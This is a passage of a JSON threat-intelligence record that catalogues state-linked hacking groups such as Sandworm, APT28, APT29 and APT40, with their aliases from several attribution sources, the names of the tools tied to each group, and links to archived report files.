				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8a33d3ac-14ba-441c-92c1-39975e9e1a73",
			"created_at": "2023-01-06T13:46:39.195689Z",
			"updated_at": "2026-04-10T02:00:03.243054Z",
			"deleted_at": null,
			"main_name": "Ghostwriter",
			"aliases": [
				"UAC-0057",
				"UNC1151",
				"TA445",
				"PUSHCHA",
				"Storm-0257",
				"DEV-0257"
			],
			"source_name": "MISPGALAXY:Ghostwriter",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "83025f5e-302e-46b0-baf6-650a4d313dfc",
			"created_at": "2024-05-01T02:03:07.971863Z",
			"updated_at": "2026-04-10T02:00:03.743131Z",
			"deleted_at": null,
			"main_name": "BRONZE MOHAWK",
			"aliases": [
				"APT40 ",
				"GADOLINIUM ",
				"Gingham Typhoon ",
				"Kryptonite Panda ",
				"Leviathan ",
				"Nanhaishu ",
				"Pickleworm ",
				"Red Ladon ",
				"TA423 ",
				"Temp.Jumper ",
				"Temp.Periscope "
			],
			"source_name": "Secureworks:BRONZE MOHAWK",
			"tools": [
				"AIRBREAK",
				"BlackCoffee",
				"China Chopper",
				"Cobalt Strike",
				"DadJoke",
				"Donut",
				"FUSIONBLAZE",
				"GreenCrash",
				"Meterpreter",
				"Nanhaishu",
				"Orz",
				"SeDll"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a",
			"created_at": "2022-10-25T15:50:23.481057Z",
			"updated_at": "2026-04-10T02:00:05.306469Z",
			"deleted_at": null,
			"main_name": "Leviathan",
			"aliases": [
				"MUDCARP",
				"Kryptonite Panda",
				"Gadolinium",
				"BRONZE MOHAWK",
				"TEMP.Jumper",
				"APT40",
				"TEMP.Periscope",
				"Gingham Typhoon"
			],
			"source_name": "MITRE:Leviathan",
			"tools": [
				"Windows Credential Editor",
				"BITSAdmin",
				"HOMEFRY",
				"Derusbi",
				"at",
				"BLACKCOFFEE",
				"BADFLICK",
				"gh0st RAT",
				"PowerSploit",
				"MURKYTOP",
				"NanHaiShu",
				"Orz",
				"Cobalt Strike",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434089,
	"ts_updated_at": 1775826749,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b48c071ae18a9bef5ea4d462d70436137953a20a.pdf",
		"text": "https://archive.orkl.eu/b48c071ae18a9bef5ea4d462d70436137953a20a.txt",
		"img": "https://archive.orkl.eu/b48c071ae18a9bef5ea4d462d70436137953a20a.jpg"
	}
}